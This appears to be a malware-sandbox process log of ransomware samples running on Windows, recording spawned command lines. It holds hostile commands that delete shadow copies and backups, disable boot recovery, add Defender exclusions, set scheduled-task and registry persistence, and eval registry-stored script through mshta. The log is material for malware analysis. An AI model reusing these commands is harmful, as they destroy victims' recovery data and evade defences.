C:\Users\Admin\AppData\Local\Temp\svchost32.exe

C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\AppData\Roaming\sevnz.exe

"C:\Users\Admin\AppData\Roaming\sevnz.exe"

C:\Windows\SysWOW64\mshta.exe

mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('sevnz.exe');close()}catch(e){}},10);"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\mshta.exe

mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ILRTISo',i);}catch(e){}},10);"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\mshta.exe

mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\YGFAN\\HDUUQ'));close();"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.jgb-18b504ff04b980a44f40f513e247126bfb0c3330e1f6968813c4aec3636687a0.exe

Trojan-Ransom.Win32.Blocker.jgb-18b504ff04b980a44f40f513e247126bfb0c3330e1f6968813c4aec3636687a0.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe

"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" #/k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Microsoft\Airexpress & exit

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" #/k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Holocryptic\Crossbarre.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\System32\ipconfig.exe

"C:\Windows\System32\ipconfig.exe" flushdns

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /delete /tn Service /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /sc minute /mo 10 /tn Service /tr "C:\Windows\system32\Holocryptic\Crossbarre.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.jzec-3a37c244c3d21d29df73b5707f6f684b67c7141686c93899307c7466e6c9c82e.exe

Trojan-Ransom.Win32.Blocker.jzec-3a37c244c3d21d29df73b5707f6f684b67c7141686c93899307c7466e6c9c82e.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe

\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic SHADOWCOPY DELETE

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.mgn-a33bf1f44df944657ed1dd3cf6c1b5985f2dfe68c50140abd5a50149c4d4ed8c.exe

Trojan-Ransom.Win32.Blocker.mgn-a33bf1f44df944657ed1dd3cf6c1b5985f2dfe68c50140abd5a50149c4d4ed8c.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Microsoft\Airexpress

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

